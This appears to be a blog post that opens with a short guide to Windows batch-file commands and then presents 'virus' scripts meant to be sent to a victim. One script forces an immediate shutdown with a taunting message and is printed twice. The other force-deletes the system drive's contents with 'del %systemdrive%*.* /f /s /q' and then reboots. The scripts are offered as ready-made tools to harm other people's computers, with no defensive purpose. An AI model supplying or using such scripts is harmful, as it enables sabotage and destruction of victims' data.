BATCH FILES-
A batch file contains a series of DOS commands, instead of typing the same commands over and over, you can simply double-click the batch file and work has been done. Writing a batch file is easier than it looks; the difficult part is making sure that everything happens in the right order. Well-made batch files can save you a lot of time over the long run, especially if you deal in repetitive tasks.1-Open Notepad.
2-Learn some basic batch commands.
like-
- ECHO - Displays text on the screen
- @ECHO OFF - Hides the text that is normally output
- START - Run a file with it's default application
- REM - Inserts a comment line in the program
- MKDIR- Create and remove directories
- DEL - Deletes a file or files
- COPY - Copy a file or files
- XCOPY - Allows you to copy files with extra options
- FOR/IN/DO - This command lets you specify files.
- TITLE - Edit the title of the window.
Once you have entered your code, you can save the file using the Batch filetype. Click File → Save As.... save "anyname,bat" and run it as administrator.
1- Shut Down Virus using Batch file
@echo off
shutdown /s -t 00 -c "Hackers Rockers was here and he did this"
READ *
Save it as " Anyname.bat " in All Files and send it to the victim.
Also read :-
Examples-
1- Shut Down Virus using Batch file
@echo off
shutdown /s -t 00 -c "Hackers Rockers was here and he did this"
READ *
Save it as " Anyname.bat " in All Files and send it to the victim.
Also read :-
2-This Virus Deletes All The Content Of C Drive...
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anyname.bat
Also read :-
No comments:
Post a Comment